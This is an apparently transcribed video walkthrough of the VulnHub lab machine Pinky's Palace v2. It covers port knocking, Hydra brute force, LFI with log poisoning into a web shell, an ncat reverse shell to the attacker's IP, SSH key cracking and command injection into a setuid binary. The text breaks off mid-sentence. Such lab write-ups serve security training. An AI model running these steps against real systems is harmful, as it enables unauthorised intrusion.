What's going on YouTube? This is IppSec and we're doing Pinky's Palace version 2 from VulnHub. I haven't done version 1 yet. The reason why I started with version 2 is simply because it's newer and more people are Googling around for tutorials on it. Additionally, with these VulnHub machines, I'm going to be doing less preparation, and I'm also going to be trying to learn new programs and techniques as I go along. So you'll see me do a lot more mistakes and fumble around, and these videos may be even longer than the Hack the Box machines, no idea. For this video, I did it with like GDB yesterday. Today, I'm going to try to figure out how to use Radar and get everything working with that tool. So probably going to give up and use GDB at some point because I don't know how to do debugging in Radar. We'll figure it out. But let's just jump in. Enough talking. We're going to start off with a NMAP scan, so let's make the directory and run nmap-sc for default scripts, sv, enumerate versions, oa, output all formats, and we'll call this all ports-scripts. I'm going to do all ports because, well, it is on my local network and the scan will go fast. I can also specify -T5 because, again, on my network and it goes fast, and then the IP address of Pinky, which is 172.16.10.139. SynScan should be finished any second, and then once it does that, it'll do the probably HTTP scan if port 80 or something is open. So take another second for this to finish. I could have also done -V so it showed open ports as it goes, but again, not going to take too long here. And as I say that, it feels like it's taking a while. Okay, there we go. We do have HTTP open. It looks like WordPress version 4.9.4, Apache 2.4.2.5 Debian. If we wanted to, we could see what Debian release this is just by a quick Google. So we can do Debian Apache 2. Don't even have to do Apache 2. Just copy and paste that. And let's see. I am guessing it's going to be packages debian.org, English Apache 2. And we can see which versions of Apache ship with each OS of Debian. So like 2.2.2.2 is Wheezy, 2.4.10 is Jesse, 2.4.2.5 is Stretch, and that is the one we are on. This is Debian 9. We have 2.4.2.9 Buster, and 2.4.3.3. So I believe we are on Stretch. Let's double check that. 2.4.2.5, yep. So we have figured out which Debian version we're on. Not that huge of a deal. It could help in buffer overflows or things like that down the line, but really does help. Just good to know exactly what your host is in case you're trying to mimic it. We also see a few things that... Actually, it says open TCPWrapped. Let's run that again without scripts and just see exactly what that output is. So get rid of all that. And see, I think this says open because of the script scans. I'm used to it just saying filtered. But we can see this TCP wrapped or filtered, and this just means NMAP can't determine if it's open or not. So if we open up Wireshark, we can explore this behavior. So let's see, get this lined up. ETH0. Okay. So we can do a nmap-p, we'll say 4654. This should come back closed, 139. We can stop this capture, and we see we send this SYN packet out, and we get a reset and ACK immediately from the server. We can see the destination port here is 4645, and then the source port it's coming from is 4645 on the server. So we know that this is a blocked port just because, well, the server told us that this port is not open. Let's try to run that scan against one of the ports that is marked filtered and see what happens. So that is 4655. And we can see we don't have that little red line. The server doesn't respond to us at all. We just have us and then us trying to connect to it again. So we send this in, we don't get anything back. NMAP's noticing that's odd behavior because all the other ports sent us a reset back, or reset ACK, which means the port is blocked. So that's why NMAP is saying these ports in particular are interesting because they're behaving differently. So Can't really do anything with that information, just wanted to point that out. Maybe later we will on this machine. Let's just go to that port 80 to see what is happening on that address. We know it is WordPress, so 172.16.10.139. We have a lot of content screwed up, and that is because WordPress likes putting full links in everything. So we see it thinks this website is http://pinkydb/wp content, and obviously we can't resolve this because it's not a full host name. So we're going to fix that by just putting something in the host file. So etc host 172.16.10.139 pinkydb. And this also tells us what the host name of this box is. Because we assume when the administrator is going to this box, he's probably doing the host name. And when you don't have a full domain name, you have to specify HTTP in Firefox. And my burp probably should be reset or something because there's some cache issue going on. I notice burp doesn't really like changing the host file immediately. So disable the proxy and then try this. Did I typo that? No. Maybe Firefox doesn't like changing the host file immediately. Let us just go to privacy and clear everything. Privacy, clear recent history. Everything is cleared, and we'll see if this does anything. If not, we'll restart Firefox. Nope, it is Firefox. Maybe it's not Burp's fault. Maybe it's always Firefox. We do see WordPress is open. So let's run a WP scan against it. So we'll make a directory called Recon and go into this and do WP scan -h to see all the options. We want to do WP scan --URL. I wonder if we have to specify HTTP or not. It's not saying HTTP in the help, so we're just going to do --URL pinkydb and see what it does. We'll do --enumerate, and I want to do plugins, themes, users, and timthumbs. Not exactly sure what that is, but let's enumerate everything. And there should be a write to file option. I wish it was near the bottom. Example version verbose threads. I just saw it. It's log, I think. --log. So --log, we'll say WP scan pinky. That should be it for WP scan. Update. You may want to click yes. I'm just going to do no. While that's going, let's do GoBuster. So opt GoBuster, GoBuster -u, pinkydb, -w for wordlist, user share wordlist, dirbuster directory list, 2.3, and what are the options? We'll do medium. And threads, we'll do 200. Again, this is local, so we can put it on full blast. And I want to save this output, so I'll do pipe it to T and do gobuster.log. I think there's a -o flag in GoBuster or something. So let's look at this output first, see if we have anything of note. My machine's definitely slowed down since I did GoBuster at 200 threads. Nothing really. We can see the theme was updated in 2017. WordPress is 2.4. That's the header of that. WordPress version 4.9.4. We could check Google and see when that got released. And the theme, timthumb files, nothing. Username, Pinky Elite. And that's about it. Looking at the GoBuster output, we do see a /secret, and I think I'm going to Control-C this because it's just slowing down my machine. But let's go and see what is in /secret. And we have bambam.txt, 3 numbers, and PinkyDB. So these are all port numbers, and it's popular on VulnHub to do some type of port knocking in your box, so that's why I went to port knocking right away from seeing these numbers. And I don't know what this PinkyDB is here. Maybe it's a hint at what the hostname is, but we figured that out through WordPress. And it's kind of odd there wasn't any information on that WordPress page. So we'll just throw that in our back pocket because normally creators won't put something out there that just doesn't exist. Or put something out there for no purpose whatsoever. There is a /WordPress directory on that. So let's just check that out before we go and create the port knock script. So if we do pinky/WordPress, and we can potentially create something. So if we click Let's Go and get the username and password for this database, we may be able to set up our own WordPress instance. And if we do that, then we'd be able to, what was I going to say? Just own the server. Because we'd be admin, and then we could potentially write a theme. We could also set the database host to us. So let's see if I have MySQL running. Do I have it installed? MySQL D status. MySQL status. I do have MySQL installed, so let's actually try that real quick before we do this port knocking stuff. So let's start MySQL with service MySQL start. And then let's log in with MySQL-u root-p, guessing root, tor. Let's just get rid of that -p flag, and okay, no default, no password on my SQL instance on my box. May want to fix that, but it's not a problem for now. Let's do create user, IppSec at PinkyDB, identified, I spelled that right, by, we'll say please subscribe. Created that user. And this @ means the user IppSec can log on from this box. So I could do % if I want to say IppSec can log in from anywhere, but with just @PinkyDB, IppSec can only log in from PinkyDB. And by default, root's probably set to localhost, so you can't just connect to my box on port 3306 and with no password and get in, probably. Grant all privileges on, we gotta create a database. Create database, Pinky, and now we can grant all privileges on Pinky, and the .star means all tables to IppSec at PinkyDB. We can do flush privileges, and now we should have a user called IppSec with a password of please subscribe. So let's do database name, Pinky, IppSec, passwords please subscribe, host 172.16.10, 168 I think I am. If config, need 0, 168. Table prefix doesn't really matter. Let's see if we get anything. Username and password, so couldn't connect. Let's see. netstat-lvnp grep 3306. It's only listening on localhost, maybe? Let's see. We can do Wireshark, and we'll see what happens. So go here, try again. Submit. Stop this. See the post. We see it connecting to us on 3306, and then us just immediately stopping it. So we have to change MySQL to actually have that port open. So IP tables -L. Everything's on accept. So maybe this is Etsy MySQL mariadb.conf maybe? My.conf, I would assume. Let's see. Nope. Not sure exactly where this config is. It tells it where to listen. MySQL.conf, not there. So let's go to etc MySQL, grep 127.0.0.1. Dot. There we go. It's probably in mariadb.confd50 server.conf 127. Let's change this to 0000. Really bad idea, but for the purpose of this video, let's do it. Restart. netstat.lvnp grep for listen on 3306. Now we see this isn't 127.0.0.1, so we should be able to potentially connect. Yeah, it's listening. Go. Sorry, but it can't create wp-config.php. So all that work for absolutely nothing. Dead end here. Because in order to install WordPress, it needs the Apache user needs write access to this wp-admin folder. And it doesn't have it, so can't complete this installation. But it was a fun rabbit hole to go down. Let us go on with that port knocking script. So as a reminder, the port knock was in pinkydb/secret bambam.txt. So let's create something. We'll call it knock.py. And we are going to use scapy. So from scapy.all import star. This is just like Python's TCP library. It does all things, not TCP, packet, network. All things network related. Scapy does, I guess. Then we're also going to do from itertools import permutations, and this is just going to make it really easy for us to do all possible combinations between those three ports. So we can show that off with ports equals a list. So put the three ports there, 7000 or 8890 7666. 4 ports in permutations ports. So if we print this, we can see it does all potential combinations. I should make this Python 3. Let's see. Same code. Sweet. So what we have to do now is do for port and ports. We gotta do something with each port. So we're going to want to create a function called sendPacket. And we'll give it 2 arguments, IP and port. And then we gotta create this IP packet. This is all going to be within Scapy code. So the first layer is the IP, and we gotta specify the source address, which is going to be me, 172.16.10.168, and then the destination address, which is going to be them, and we're defining it within that with IP. Next line, we're going to call this create a layer for SYN, and that's going to be TCP. So we're creating the TCP layer. We're calling this SYN because all it is going to be a SYN packet. So sport is equal to, we'll say all 7s. We hit the jackpot. dport is equal to port. Flags, we got to specify capital S for SYN. And sequence number, we'll do 1, 2, 3, 4, 5. Just general layers in the TCP packet. And then we can send IP SYN. So now we can say send packet to the IP 172.16.10.139 and then the port. So this should send a SYN packet to all potential combinations of those 3 ports. And that's essentially how port knocking works. Ports appear to be offline until a magical knock happens. And once that magical knock happens, then it magically comes back online. So let's do NMAP, let's see, cat NMAP, all ports. This, and we see 4655 was marked closed. So P4655, or is marked filtered, I should say. 172.16.10.139, and it's still filtered. So let's run our script a few times. For in sec13, we'll run the script 3 times. Port knocking itself isn't really a science. So see if that works. Still closed. That is odd. Vim knock, let's see. Ports are there. Let's print port. We'll print ports. Set 1. That should do it. I may have a typo somewhere. Let's do this NMAP again. Still filtered. Let's see. Does it not like that for a source port? 4000. That may be fine. Run this again. Still says filtered. Huh. Let's import a sleep. Maybe we're hitting it too fast. So from time import sleep, send packet, and we will sleep for 1 second. So we just hit ports 7000, 666, and 8890. Let's verify that all 3 of those are in this. 7000, 666, 8890. Okay. Hit this again. Still says filtered. Map-p-. Are they all filtered? Yes, they are. Let's see. May have something wrong in this, so let's Wireshark this. Make sure it's a SYN packet I'm sending. Let's see. And stop this. So I sent that, then I sent that, and then I sent this. We can see it is a SYN packet. The very first layer, this IP layer. My destinations. That. Let's double check my IP. I'm pretty sure that's correct. My IP is correct. Huh. Let's try hitting it with netcat. So netcat 172.16.10, 139, was it 7,000, 666, 8890. And then we can NMAP it. Still says filtered, so I'm gonna reboot the host just in case something happened and then try it again. The host has been rebooted, so let's do this again. We'll just use my for loop, which does it 3 times, and we'll check. I guess I got rid of the sleep, but let's see. NMAP-P- still says they're all filtered. Let's try one last thing. I doubt this is the case, but this guy could be incredibly mean. So let's create a new thing called test port, and we'll just do IP port again. And now we need to import socket, and we can probably do this all here. So sock is equal to socket. So what I'm doing now is I'm going to test if the port is open after every loop, because it is possible that there is a port knock which closes everything. So we could be opening the port up and then closing the port. So result equals sock connect 122.16.10 139, and we'll test port elite stood out to me. This is just one of those ports that was filtered, and I actually remembered specify that elsewhere. So IP port, and then we can say if result. I don't know what the results are, so we'll just return this and print it out. So after every successful loop, let's print test port, and that is going to be 172.16.10 139 and port elite. And let's run this again, see what happens. I can't code, that's what happens. Let's see. I should have set a timeout. I figured it would just get like... Oh, it's not getting the send reset because this is one of those darn port knocks. And it doesn't send the reset, so it has to time out. How do we make sockets time out? Let's check. Let's just do sock.timeout 1. See if this works. Maybe. Has no attribute timeout. Let's do cat.knock.py, IPython. I didn't do 3. Oh well. Should be the same. Import socket. And do this. Sock dot receive send set timeout. That's what it is. Exit vim set timeout. There we go. And we see it returns something different right here. After the very first one, it returned a 1. So let's just send 3 packets with that, because I think this one is actually the one that may close it. So let's test this out real quick. We can comment this all out. We want send packet, and it was 7,666,8890. Execute this, NMAP-P, elite, 172.16.10.139. It is open. And then what was that very next packet? Let's verify that our assumption is correct, that this one closes it. So reverse these two numbers. 8890, 666. So port is open. Run this knock. Port is still open. 7,8890,666. I thought it would have went to closed. Let's try that again. Nope. I'm not sure why the socket's not closing anymore, but that fixed it. Whatever we did, I guess testing the port just fixed it. Doesn't really make sense, but let's just run this again. It is open. Let's run this whole script again, see if it shuts down. And if it doesn't, I'm at a loss. Ports. Oh, this is Python 3, I think. Line 22. What did I do? Oh, crap. For ports and port, send packet 172.16.10.139 and port. Yep, I'm at a loss exactly what happened, but it looks like 0 means it is open. So, what was the very first result? Up here, the very first result is, looks like 11, which I'm guessing is closed. Maybe it was 1 and it just printed twice. And then after that, it went completely open. So 0 must mean open. That was an annoying thing. I really hate anything related to port knocking. So we can move gobuster.log into the Recon folder and let us begin with doing another NMAP. So we'll do nmap-sc, sv. We can do all ports. It won't really matter. And then OA for output all formats, nmap, post knock, and then the IP 172.16.10.139 T5. I think that's it. Run this, and this should take probably 15-20 seconds to complete, and we'll find out what all the other ports are. So it's doing the service scan now, and it's done. So let's see. That's interesting. Elite printed something. Welcome to Daemon or Damon. This is soon our backdoor into Pinky's place, and we treated it like HTTP it looks, sending the options. That's just the banner info. We got Nginx on port 7654, SSH on port 4655. Actually saying Debian 10. Were we wrong by that? Apache 2425. Oh, I really hate Debian naming convention. Debian 10 plus Deb 9. It's either Debian 9 or 10. I'm guessing that's stretch. But yeah, that can't be more confusing. So let's check what is on Nginx. So 7654. PinkyDB 7654. We get a login prompt and Pinky database login. It right off the bat says invalid username and password. Looking at the page source, don't really see anything, so let's send this over into repeater and try a few things. So username admin, password is password. Click login. Intercept on. Admin, password. Send this to the repeater tab. Nothing there. We still see invalid username or password. We can try Pinky Elite. Invalid username and password. Pinky. Nothing there. Let's check something real quick. Let's go back here. See if we can enumerate usernames. So turn intercept off. Let's see. Root. Not found. PinkyDB / root. Not found. So, okay. I wasn't sure if we could enumerate usernames through trying to go to home directories. Doesn't look like we can. So let's go back to the repeater. We can try or1 equals 1. Nothing there. So let's just send this over into SQL map and then try some other things. So name this tab Recon. Go back here. Just copy this. Login request. And we're going to have to get rid of the blank spaces. You could do copy to file. I didn't feel like dealing with the file dialog that pops up and going into this directory. So SQL map -r for request file. We can say level 3 risk 5. I always get these two confused. Risk must be 1 to 3. Level 5 risk 3. Okay. I think there's a batch flag I can actually do that will make it so it never prompts me for anything. So we'll see if that just works. While that's going, let us go back to that WordPress page, because as I said, it's odd for the WordPress page to be there and have absolutely zero purpose. So what I'm going to do is I'm going to run cool against this and scrape all the words. We have multiple languages, so it could also be a hint. Cool. And then specify, let's see, URL. So HTTP PinkyDB -m. We'll say the password's at least 6 characters probably. -right WordPress -pw. And we have a nice word list here. So let's go into our Recon folder. And doesn't look like my WP scan actually wrote anywhere. Nope. Was I at NMAP when I wrote that? Nope. So I guess However, I did the log option in WP scan, decided not to save it where I wanted it to save. Do I have that here? -- log. That's a volatility thing. It was in this window that's doing SQL map. Log. There we go. WP scan -pinky. Let's do update DB. Locate WP scan -pinky. And it's in WP scan's home folder. Amazing. So we can look at the results, and we do have a username at PinkyLeet. So let us just, on a whim, create users. Let's say PinkyLeet, Pinky, root, and guest. And PinkyDB. Just because PinkyDB was called out after the port knock. Okay. So we can now do the Hydra request against this web server. So let's look at the options. That is quite a bit. Let's see. I think I remember how to do this. Hydra -L, because we're going to specify a actual file. Lowercase would specify a single user. And -P, same concept. What would I save the password as? WP-PW, I think. Then we can specify the URL, which is PinkyDB7654. It is the HTTP post form plugin. Like other options are SSH, FTP. FTP, it gets it by URL. Probably have to specify HTTP since it's specified FTP and all that stuff. Okay. Then we have to give it the actual page. So going into burp, it is /login.php. Then we can do a colon. We pass it the user and pass variable. So user equals caret user. And that caret just means pull it from the user file. And pass is equal to pass. That should be it. And then the final step is something on the page that doesn't exist on a successful login. So invalid username. Invalid username. Should be it. And I have a failure. So let's see. Invalid target definition. If I get rid of this port, does it work? Is it a port thing? Please don't be a port thing. Okay, it's not. Let's see. What did I screw up? Invalid target definition. Okay, it doesn't want HTTP. My gut was correct. That's odd. 7654. Okay. Let's see if Hydra actually goes and cracks it. 0 passwords. Could not resolve the address. PinkyDB7654. Hydra-H grep-I port. -S, maybe? -S. 7654. Okay, so Hydra doesn't like the port in the URL. And got a few. So root WordPress, guest WordPress. Let's test those out real quick. That first one I recognize. I didn't recognize the other ones. So yeah, those aren't valid. I guess after a valid login, it got a session cookie or something and kept going. Was I capturing? No, I was not. Oh well. Let's try the very first result. Pinky and Passion. Pinky bash on, and we get a login. The thing to note right now is we get pagegap.php !leet is equal to file self something 101.php. So this executes some PHP thing. We can look at Stefano's RSA, which is a ID RSA file, and notes on who Stefano is. He's an internal web developer. They created a RSA key for him. So let's download this. We'll make this directory nginx. And curl -o Stefano, spelled that right, .key. So we do see it is a encrypted key. So I had ignored that, and this is my mistake. If you remember or paid attention to my Twitter, I tweeted something out asking if something was broken. This is about the step where I thought something was screwed up. So I went ahead and fuzzed this leet thing to try to get code execution. So this looks like a LFI vulnerability. The very first thing I did was HTTP. Let's just send this to Bert. It'll be easier. What was it? This. Go to Bert. Proxy history. Send. Nope, that's not it. This is it. So the very first thing I did was try to send something to me. So HTTP 172.16.10.138, and we'll listen on port 80. If we get a callback, we have a RFI, remote file inclusion, and we don't. So my next step is to do etc passwd, and we get something. We get the passwd file. So we could keep doing a bunch of LFIs, or we could switch to, let's say, PHP, filter convert dot base64-encode resource is equal to, that's a slash, then etc passwd. And all this does is makes the output in base64 form. The reason this is useful is because then you can do things like grab those PHP files. So we could do vir www html wordpress wp-config.php. It's not the location. Let's see. Is it vir www apache? Apache 2? Is it WP? Is it -config? Do I still have that here? WordPress config file. wp-config.php. Oh, it wasn't in the WordPress directory. For www HTML, because we couldn't write to the WordPress directory. Let's try Apache. Get rid of HTML. Put HTML here. And there, we finally found the location of where Apache is storing its root directory. If we wanted to, we could have probably also done like etc, Apache2, apache.conf or something, and enumerate it based upon where the Apache config file is. I can't remember off the top of my head where it is on Debian. Oh, I'm on Debian. Ubuntu's Debian. Find /etc grep Apache grep conf etc apache2 apache2.conf. So if we wanted to, we could have done that. So we could have, let's put this a new one, call this B64. Etsy, Apache 2, apache2.conf. apache2.conf. Grab the config files out of here. Let's see. It's probably document root or something. Ver dub. See, 2 matches. So probably grep sites. Let's see. Badger 2 sites available 000 default. We can try this one. Again, pen testing is just knowing a system better than the sysadmin. So knowing where all config files are saved is incredibly helpful. So there we go. We got the document root that way. You can do the same thing with Nginx, which I think is running on port 75,000 something. But that's how I got the Apache directory initially, is through enumerating it that way. If we just try to include a PHP file, we don't get anything. And that's because it actually tries to execute it. So that's where the base64 comes in handy. So make dir apache wp config.php.b64. Paste that. base64-d wp config.php. And it didn't copy all of it. Let's see. Let's just curl this. Copy as curl command. Did not like that. Copy. base64-d. Don't get an error there. Okay, I guess it was in my copy foo. But now we got that WP config, and we could also get more usernames from this. So we know Pinky WordPress is the WordPress user, PinkyDBPass_WP. And if you did this with the Nginx, you could probably find more keys. You may also be able to generate a WordPress cookie with just all these secrets. I'm not sure if WordPress has updated it. I haven't tried it lately. But that's another task, because if we had... Actually, one last thing to show, and then we can go to cracking that RSA key. So, all that PHP filter stuff is beyond what you have to do, because if you look at like ver log, what was it, Apache access log, Apache 2, HTTPD, can't read it, ver log, log apache 2 access.log. This file could be too big from the dir busting to actually read it. We can check error.log. So these logs may have gotten too big. Let's see. Ver log access.log. Should be an LFI word list we can test. GitHub LFI word list. That has a bunch of useful things to test with LFI. Seclist may be a good one. Web shells, miscellaneous, fuzzing. Maybe those two. Let's see, what is this? Apache 2, Apache logs. Could be beneficial to use this in a robust against that. Let's see. For log, access.log. Let's see. Can I access anything? Is it messages in Debian? Make sure my request is still good. Etsy passwd. That works. For log. Nginx. Verlog. Nginx access log. Try Nginx. Waiting. Okay. So we can read the Nginx log, and it is huge. If this file gets too big, then you potentially can't read it. And we look, we have a user agent here. So we could just specify our user agent to be, let's see, PHP echo IppSec rocks. And if we get the actual IppSec rocks without all this PHP, we know we executed code. So IppSec rocks. Let's see. Do we get anything? Stupid burp. Can't tell. Test. Go. Oh. I just gave it invalid code. That wasn't valid PHP, and now that log is dead. That is awesome. Error log. Sweet. We have this. We can try again. Let's see. I don't know where I created that error. Let's see. I think I needed parentheses around echo. No. I actually don't know where it errored out. That's odd. Can that do it? Maybe I did. I don't know. It didn't like something because now we get that big error message. So here, it doesn't look like we're outputting. That is annoying. If I go away from burp, go back, still there. Get rid of it completely. There we go. Let's see. Failed opening Verilog messages for inclusion on this line 2. So I wonder if we can now just put, instead of it in the user agent, we can do something like PHP info, a command I know this won't screw up, and we have to URL encode this. That went okay. Let's see if we did that. Nope, we get internal server error. So I'm actually going to fix this so we can demo this thing because something went bad. So I'm going to figure out a way to fix this and then we will resume the video. So I think I figured it out. Let's refresh. Waiting. Come on. Oh, I have to do the port knock again because I rebooted it. What was it? NC. Let's just go back to the this. Knock.py. We wanted 3 ports. So let's see. Should do it to get that IP back up. Come on. There we go. So that was just me doing the port knock because I rebooted the box. What actually happened, I'll copy one of these log lines out because I didn't know this. Actually, I think we can show it. So if I do test in quotes on this access log on Nginx, let's see, do I see me? Do see me. Let's do it like this. Looking at the server logs, it had encoded those quotes in hex. So let's see if it did that. Yeah. So I just can't see the request I'm making. So there was my last request, and those double quotes got encoded in \x22, which is the hexadecimal for double quote, I'm guessing. So if we do that again, we should see the one with it in the middle. So it was PHP, and then had that as the escape. So whenever you're doing this type of thing on Nginx, make sure you test your characters to ensure you're not putting bad characters in. So do this twice so we can see if it encodes a single quote. It does not. So in a PHP script, we're going to be using single quotes. So we can do echo, PHP echo, IppSec rocks, semicolon. Please don't screw this up again. Do this twice. And we can see IppSec rocks got put in, not the PHP or echo, so we have this completely with command and execution. So if I go to my op shells, I can do PHP cat cmd.php. We can paste this. Make sure we don't have any double quotes. Those are single quotes already. That is good. And here goes nothing. Let's hope Nginx likes all these characters. So we can get rid of that. Make my user agent something else. And we have to say, and ip equals, we can do any command we want. So we'll do who am I. And we can see we got output of that command, so we have full command execution. To make things a little bit easier, I'm going to send this to a post request. Where is it? Change request method. Click go again. Didn't get anything. So I think this is a get variable. And the weird thing about post request, you can still throw the get variable up in the URL, and then you can have the post down here, and it should happily work. Yep. So we can now do, let's see, ip is equal to which ncat to see if it has ncat on it. Ncat has -e, which makes life really easy. And we do have it right here. We probably should have put something in the PHP thing that said like IppSec rocks, here's the command, because all the command output's always going to be down here, and it can be hard to find eventually. But we do have ncat, so ncat should make it really easy if we just do ncat-e bin sh 172.16.138 and port 9001. Go back to our shell and see LVNP 9001. Click go. We're 168, I think. There we go. We get a call back. Then we can do Python C import pty, pty.spawn, bin bash, dy raw minus echo, foreground that. And now we have the web shell for www data. And this is what I had, and this is where I thought something may have been broken, because if we do a ls-la on /home, we see Stefano. If we go in his directory, he has tools, do a ls-la, and we got this qsub binary that is oddly owned by www data, which is oddly who we are, and its execute bit is set. But we can't execute this. Permission denied. So, look at ID, everything looks normal. If this had the read permission on the bit, we would be able to execute it. And one of the odder things is, if we go back to this and go to the LFI, we can probably do home, Stefano, tools, qsub, and actually read it this way. So something in the process of getting our shell made it so we can't read this binary. If we try to cat this, oh no, cat works. We just can't execute it. Weird. Echo, export, term. Is that it? Xterm. Whoops. If I can remember my terminal type. 256 color. There we go. Now we got clear. So, yeah. Linux permissions are hard. Don't exactly understand what's going on there. But, since I couldn't execute this, that's why I thought something may have been awry. However, if you remember, and we avoided doing all this LFI stuff, and just went to Stefano's RSA, which we have saved already on a box. Call this shells. Oh, that was in Nginx, I think. Stefano.key. We could try cracking this. So, let's do that. Copy the file over to my cracking rig. And then SSH in. And we can use John to crack this because I don't think Hashcat actually cracks SSH keys. Not a huge John fan. This is one of the few times I actually use it. So in my John run directory, I have SSH and G to John. There is a program on Kali that is SSH to John. I think this works for regular John, and SSH and G is for Jumbo John. The difference between the two being probably regular is CPU, Jumbo is GPU support. Not 100% positive, but I use SSH and G. If one doesn't work, try the other. That's generally the rule. So we can move that to root stefano.key.hash, I guess. Well, not hash. Okay, crack. Not sure exactly what to call that, but probably .john would be the best format. And then we can run John against it. So ./John, root stefano.key.crack. We'll use the rocku word list, so opt word list rocku.txt. And let's run this. And we already have the format cracked as secrets with a Z101. So we can switch back to my shells. Actually, shells and split the pane. And SSH-I, what did I save that? It's Nginx. SSH-I stefano.key. Stefano at 172.16.10.139. Port refused. we have to look at the NMAP. NMAP postnoc.nmap. We have SSH on port 4655. So unprotected key file, we have to chmod it to 600. Password's still on my clipboard, awesome. Put the passphrase, and we log in. So now, we can go to the home directory, go into Stefano, go into the current user's home directory, and just go to Tools, and now we can execute this qsub program. If we look at Note, it says Pinky made me this program so I can easily message him. And if we do /qsub some message, import password, incorrect password. So we have to do some reversing right now. Let's go into this SSH tab, get rid of my password cracking. We can say VPW. We'll just rename this Nginx folder to Stefano Key. So let's SCP qsub to us. So SCP 172.16.10.139. And this is a -P. And the port was, I think, 4655. And tools qsub to me. And we'd specify Stefano. And -I Stefano Key. It actually didn't let us copy that file. Let's go back to shells. Guess because we don't have read access, but we can probably base64 it. qsub, permission denied. Let's just grab it through HTTP. So if we go here, home Stefano qsub. I wonder if we could actually go from www.data and base64 qsub. Yeah, we can. Sweet. So as www.data, we can run base64 against that to copy this file off. Copy everything. Let's go here. Make dir re, and we'll do vi qsub.b64. Paste the base64. Base64-d qsub, make that executable, and we can execute it. And we see the same message we saw before. So we could just right off the bat try to cheat and do like an L trace on it. If we do qsub test, input password, and right before that is doing a get environment on term. If we enter some bad password, we see a string compare against screen. And if I do a get env and grep for term, or not get env, if I just do env and grep for term, I see my terminal is set to screen. So if we do test, input password, screen, if I could type it correct, we could see then it fails to create a message. So if we go back here, we could create a message, qsub test, and try screen again, and it's emitted. But if we wanted to actually do some reverse engineering, we can load it up into Radar. I'm going to do -d so we can execute it eventually. I'm going to do qsub test. Very first thing, Radar usage, it's going to look like alien, but it's very simple. If you do question mark, you got a bunch of things. Like A means analysis commands. So I can do analysis and then question mark, and then I see other things. I can do AA question mark, and I can see triple A analyzes all the things. So that's why I run first. And then you got like a P command. P is for print. Then you got a bunch of P's. You can do PX to print hexadecimal. You got the D commands. D is for debugger. DB breakpoint commands. DB question mark, you can see a bunch of things. Then you can see DC is continue execution, and you can see continue execution up until a lot of different things, which is very useful. Continue until return, continue until execution of all children, etc. That's something that GDB doesn't really do, is have a lot of those continue until things. That makes Radar nice in debugging. But we can do VVV to enter visualization mode. We can see all the functions here. I go to sim.main because this is where we start. I hit G to go, and G again. And then we can hit P to cycle different viewing modes. And you can see the commands it's doing right here, like pxw at main, pxx at main, pxa, pss. Or you can hit capital V and jump into this graph. And this is where I really like Radar, so we can analyze what's going on. So we go into main, start here, and we're doing something right off the bat. And this is the message. So %s, that's probably going to be qsub, message, whatever. So if we go back to our shell and do /qsub without anything, we can see that usage. So right here we're loading EDI, which is going to be the number of arguments, and if that is not equal to 1, then print this. And I think it's not equal. We can test if it's not equal by doing 2. Okay, so if it's less than 1 is when it does that print statement. So we know that. So if we give it 1 argument, we go down here. We're going to load the string term into RDI. And we can see this, since we did AAA, I think, it automatically put a memory address and gave it a name. And we can see its contents is TERM, and that is the memory address of it. So if we had exited this, or I think I can do a semicolon to execute commands? No. But I bet if we did a PX at that address, so hit Q a few times, PX, I have to do that @ we can see that variable. So Radar automatically just made that pretty for us. So we loaded that, and it's stored at this local _8h. Then it asks us for the password. And again, automatically, right here would be the phrase input password. Then we're calling, we're loading another address, and then we're doing a length check and comparing RAX local _50 to RAX. So I'm guessing this is going to be our input into RAX. And then we're going to compare that against this. We're going to call strlen, and strlen is going to pull, calculate the length of whatever's in RDI. So RAX is moving to RDI, and I think RDI is the very first argument in 64-bit programs. That's one of the different things between 32-bit and 64-bit is 32-bit, you put a bunch of arguments on the stack and pop stuff off the stack. I think that's the correct terminology. And grabbed arguments that way. In 64-bit, arguments go directly onto registers. So calculate the length of our user input, and if it is greater than 40, then we fail. And it says hacker go away. So let's do something that's greater than 40. So go down here, Python C, print A times 40, or 40 or greater. We'll try that. So our message is 40 A's. We know the password screen. Question submitted. 41 A's, 42 A's. Something's not going. Python-c print A times 42. / qsub 42 A's. Oh, that's not message. Password. If the password is 40 characters or more, print bad hacker go away. Sorry, it's been a long video, and we still got plenty to go. So, we know that. Then we go down here, and we're loading two things. Local 50H, and we determined that was probably going to be our password, and 8H, which is all the way up here right around the environment variable. So, this is where it's doing that comparison. And if you couldn't do all that, we can also switch into debugger mode. And this is probably where I'm going to make mistakes. So let's see. We can do db main to set a breakpoint on main. Then we can do dc to continue until breakpoint. And we hit the breakpoint. I'm going to do capital V to enter visualization mode. And then we're going to do P a few times to get into a mode we're familiar with. And we could hit C and then tabs and then go here and set breakpoints if we wanted to. We could also escape out of that, do that again, hit capital V, get into this, then hit P to change a viewpoint. Now we can see memory addresses. We can set a breakpoint this way. And I'm sure there's hotkeys to actually navigate in these windows, but I don't know them. So I'm just going to copy this where the call is, and we're going to look at RSI and RDI. So break at memory address. Oh, I think break at is when I do names. Nope. I need to do at. I think. Oh, DB. This is not GDB. What is B? Display current block size. Okay. DC, and I should break right after I give it my password. So we'll do IppSec for the password. I hit a breakpoint. If I do PDF, I can print the function I'm in. And we want RSI and RDI. So we can do PX RSI. We need at. And we can see its screen. I think if I do PX0, it goes until a null byte. No. We can see that is screen. And RDI is IppSec. And then right after IppSec, we have some null bytes. So we can see that comparison there. So that's how you do that. One other cool thing about this is I was using PDF. We can do PDF at main to analyze the main function. If we do PD question mark, we can see there is a pseudo dissembler output in C-like syntax. So we can do PDC at main. And it will try to give us some C code if you don't want to read assembly, which sometimes is very helpful. And then we can see the B there, and that's where our breakpoint is. So let's go back into visualization mode and see what we wanted to do. Let's see. So once we get the question submit, we go down here, and we go to the get UIDs, set them, and then send. So we want to look at the send function. So let's do VVV, go over to send, hit G twice, capital V, and we can kind of see what's going on. So the send function is going to run bin echo %s, this is where user input is, and direct it to this file. So if we do semicolon here, we can probably get a command injection, because down here we see it doing a call to system. So now we know enough information to finally exploit this binary. So let's do that. we can go to our shells, and we could do /qsub, put this in quotes so it's all one argument. We can do 1, we don't really care, this is that bin echo. We can do a semicolon, touch/temp owned, then another semicolon, and we can do who am I, and that can go to the direct. So right now we just did bin echo, and we echoed 1, does nothing. Then we did a touch on a file in temp, and then we ran something and directed into Stefano message. Who am I? So if we do this, input password screen, we see it submitted. If we do it ls on temp, we can do -la. We see owned, and Pinky is the owner of that because of the SetUID stuff. So the way to take advantage of this is we're going to go into opt shells. I have a SetUID program I want to use, exec.c. We will copy this, go up here. We can have Stefano create temp SetUID.c. I can set paste so 